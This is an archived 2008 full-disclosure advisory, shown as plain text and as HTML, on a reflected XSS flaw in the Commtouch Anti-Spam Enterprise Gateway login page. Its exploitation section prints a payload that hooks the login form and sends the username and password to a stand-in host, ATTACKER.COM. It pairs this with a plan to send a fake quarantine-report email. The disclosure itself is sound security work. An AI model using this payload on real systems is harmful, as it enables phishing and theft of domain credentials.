[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Commtouch Anti-Spam Enterprise Gateway Cross Site
From: "Erez Metula" <erezmetula () 2bsecure ! co ! il>
Date: 2008-06-26 14:15:51
Message-ID: C9B2DD4DEDB9214A84BB2937ACE45B6DA87C4B () server05 ! 2bsecure ! co ! il
[Download RAW message or body]
--===============0579431475==
Content-class: urn:content-classes:message
Content-Type: multipart/related;
boundary="----=_NextPart_000_02F3_01C8D7A7.E8A8DC70"
This is a multi-part message in MIME format.
[Attachment #2 (.)]
Commtouch Anti-Spam Enterprise Gateway Cross Site Scripting (allowing
domain credential theft)
I. INTRODUCTION
Commtouch Anti-Spam Enterprise Gateway is an anti spam solution,
protecting enterprise networks for the ever increasing spam emails. The
anti spam solution includes a web application console which enables the
enterprise users to check the blocked messages, release messages, apply
blocking rules and more.
For more Information please refer to:
www.commtouch.com <http://www.commtouch.com/>
II. DESCRIPTION
A reflected XSS vulnerability was discovered by Erez Metula in the
product login page which enables an attacker to steal a victim's
credential to the corporate network. Since the login credentials are
usually the victim's credentials to the domain, it is a high risk
vulnerability which puts the whole domain passwords at risk.
Apart from being used as a regular reflected XSS attack vector, for
example by sending a malicious link to the user, there is another attack
vector that can be used which derives from the specific way the product
works.
The product sends a periodic email report to the user, listing the
emails that were identified as spam and were blocked. The user is given
an option to release / approve the mail, by clicking on the
corresponding link.
Clicking on the link brings the login page, in which the user enters his
domain credentials in order to access the web application and commit the
action.
In case an attacker sends a fake link pretending to come from the
product and containing the XSS link inside it, the user can be easily
enticed to supply his credentials in order to access the product console
III. EXPLOITATION
As explained above, exploitation can be achieved by traditional XSS
methods by utilizing the following pattern:
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&
LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD
</SCRIPT><input%20type="hidden"%20name="XXX"%20value="X
More interesting is a specific exploitation tied to the product
behavior, in which an attacker will fake the "My Quarantine Report"
coming from the product.
Steps:
1) Setting up a credential stealing page at
http://ATTACKER.COM/stealer
2) Building a fake "My Querentine Report" email with some enticing
"release me" email
3) Replacing the content of the contained links inside the mail to
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&
LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function SendCredentials(){
img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid=" +
document.forms[0].LoginName.value + "&password=" +
document.forms[0].LoginPass.value;} function HandleSubmit(){
document.forms[0].onsubmit= SendCredentials; } window.onload =
HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x
4) send the fake email, pretending to be from the commtouch service
IV. IMPACT
Since the login credentials are usually the victim's credentials to the
domain, it is a high risk vulnerability which puts the whole domain
passwords at risk.
V. DETECTION
Detection of this vulnerability involves injecting some HTML tags /
scripts to the "PARAMS" parameter at the login page.
VI. WORKAROUND
Although originally reported for version V4 at 2006, the problem was not
solved even in version V5.
There is no official solution yet.
The only workaround possible is to blacklist HTML / SCRIPT tags, which
can be bypassed relatively easily and is not considered a very good
solution.
VII. VENDOR RESPONSE
Commtouch has been informed on the 7/12/06 by e-mail to their support.
Commtouch didn't not fix the problem by the time of publish.
VIII. DISCLOSURE TIMELINE
26/12/06 Identification of the flaw
27/12/06 Reporting the flaw to Commtouch by email
28/06/06 Response from Commtouch, asking for more description
03/01/07 Providing the full description to Commtouch
22/01/07 Commtouch acknowledge of the vulnerability
22/01/07 Commtouch response for an unknown deliver time for a
patch
27/01/07 Commtouch was notified about full disclosure of this
information to the public
26/06/08 Release of this information, after no patch nor a fix
at the version V5 release
IX. CREDITS
The vulnerability was discovered by
Erez Metula, CISSP
Application Security Department Manager
Academic Director, 2BAcademy
Security Software Engineer
E-Mail: erezmetula@2bsecure.co.il
[Attachment #5 (text/html)]
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" \
xmlns:w="urn:schemas-microsoft-com:office:word" \
xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
text-align:right;
direction:rtl;
unicode-bidi:embed;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:Arial;
color:windowtext;}
span.a1
{color:green;}
@page Section1
{size:595.3pt 841.9pt;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:1401446426;
mso-list-type:hybrid;
mso-list-template-ids:-867282020 67698705 67698713 67698715 67698703 67698713 67698715 \
67698703 67698713 67698715;} @list l0:level1
{mso-level-text:"%1\)";
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple> <table align="center" border="0" \
id="28FCE90E-9FBC-44da-BBF7-D3997DC20E83"> <tr>
<td align="center">
<a href='http://www.admail.co.il/Statistics/Redirect.aspx?cid=1286&camp=1&til=http://www.2bsecure.co.il' \
target='_blank'><img src='cid:AdmailImg1' border='0'></a> <br>
</td>
</tr><tr>
<td style="BORDER-TOP: silver 1px solid"> </td>
</tr>
</table>
<div class=Section1 dir=RTL>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Commtouch
Anti-Spam Enterprise Gateway Cross Site Scripting (allowing domain credential theft)<br>
<br>
I. INTRODUCTION<br>
<br>
Commtouch Anti-Spam Enterprise Gateway is an anti spam solution, protecting enterprise
networks for the ever increasing spam emails. The anti spam solution includes a
web application console which enables the enterprise users to check the blocked
messages, release messages, apply blocking rules and more. <o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
For more Information please refer to:<br>
</span></font><span class=a1><font size=2 color=green face=Arial><span
style='font-size:10.0pt;font-family:Arial'><a href="http://www.commtouch.com/">www.<b><span
style='font-weight:bold'>commtouch</span></b>.com</a></span></font></span><font
size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
<br>
II. DESCRIPTION<br>
<br>
A reflected XSS vulnerability was discovered by Erez Metula in the product
login page which enables an attacker to steal a victim's credential to the corporate
network. Since the login credentials are usually the victim's credentials to
the domain, it is a high risk vulnerability which puts the whole domain
passwords at risk.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Apart
from being used as a regular reflected XSS attack vector, for example by sending
a malicious link to the user, there is another attack vector that can be used
which derives from the specific way the product works.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The
product sends a periodic email report to the user, listing the emails that were
identified as spam and were blocked. The user is given an option to release /
approve the mail, by clicking on the corresponding link.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Clicking
on the link brings the login page, in which the user enters his domain
credentials in order to access the web application and commit the \
action.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>In
case an attacker sends a fake link pretending to come from the product and
containing the XSS link inside it, the user can be easily enticed to supply his
credentials in order to access the product console<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
<br>
III. EXPLOITATION<br>
<br>
<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>As
explained above, exploitation can be achieved by traditional XSS methods by
utilizing the following pattern:<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/logi \
n.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD \
</SCRIPT><input%20type="hidden"%20name="XXX"%20value="X<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>More
interesting is a specific exploitation tied to the product behavior, in which
an attacker will fake the "My Quarantine Report" coming from the
product.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>Steps:<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>1)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> \
</span></font></span></span></font><![endif]><span dir=LTR><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family: Verdana'>Setting up a credential stealing page at \
http://ATTACKER.COM/stealer<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>2)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> \
</span></font></span></span></font><![endif]><span dir=LTR><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family: Verdana'>Building a fake "My Querentine Report" \
email with some enticing "release me" email<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>3)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> \
</span></font></span></span></font><![endif]><span dir=LTR><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family: Verdana'>Replacing the content of the contained links \
inside the mail to<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function
SendCredentials(){ img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid="
+ document.forms[0].LoginName.value + "&amp;password=" + \
document.forms[0].LoginPass.value;} function HandleSubmit(){ document.forms[0].onsubmit= \
SendCredentials; } window.onload = \
HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'>4) send the fake email, pretending to be from the commtouch
service<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
IV. IMPACT<br>
<br>
Since the login credentials are usually the victim's credentials to the domain,
it is a high risk vulnerability which puts the whole domain passwords at \
risk.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
<br>
V. DETECTION<br>
<br>
Detection of this vulnerability involves injecting some HTML tags / scripts to the
"PARAMS" parameter at the login page.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
VI. WORKAROUND<br>
<br>
Although originally reported for version V4 at 2006, the problem was not solved
even in version V5.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>There
is no official solution yet.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The
only workaround possible is to blacklist HTML / SCRIPT tags, which can be
bypassed relatively easily and is not considered a very good \
solution.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
VII. VENDOR RESPONSE<br>
<br>
Commtouch has been informed on the 7/12/06 by e-mail to their support.<br>
Commtouch didn't not fix the problem by the time of publish.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
VIII. DISCLOSURE TIMELINE<br>
<br>
<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>26/12/06 \
Identification of the flaw<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>27/12/06
Reporting the flaw to Commtouch
by email<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>28/06/06
Response from Commtouch,
asking for more description <o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>03/01/07 \
Providing the full description to Commtouch<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>22/01/07 \
Commtouch acknowledge of the vulnerability<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>22/01/07 \
Commtouch response for an unknown deliver time for a patch<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>27/01/07 \
Commtouch was notified about full disclosure of this information to the \
public<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>26/06/08 \
Release of this information, after no patch nor a fix at the version V5 \
release<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
IX. CREDITS<br>
<br>
The vulnerability was discovered by <o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
Erez Metula, CISSP <br>
Application Security Department Manager<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Academic
Director, 2BAcademy</span></font><b><font size=2 color=purple face=Tahoma><span
lang=HE dir=RTL style='font-size:10.0pt;font-family:Tahoma;color:purple;
font-weight:bold'><o:p></o:p></span></font></b></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span \
style='font-size:9.0pt;font-family:Verdana'>Security Software Engineer<br>
E-Mail: erezmetula@2bsecure.co.il</span></font><font size=2 face=Arial><span
style='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p>
<p class=MsoNormal dir=RTL><font size=3 face="Times New Roman"><span dir=LTR
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>
["2besecure.jpg" (image/jpeg)]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0579431475==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic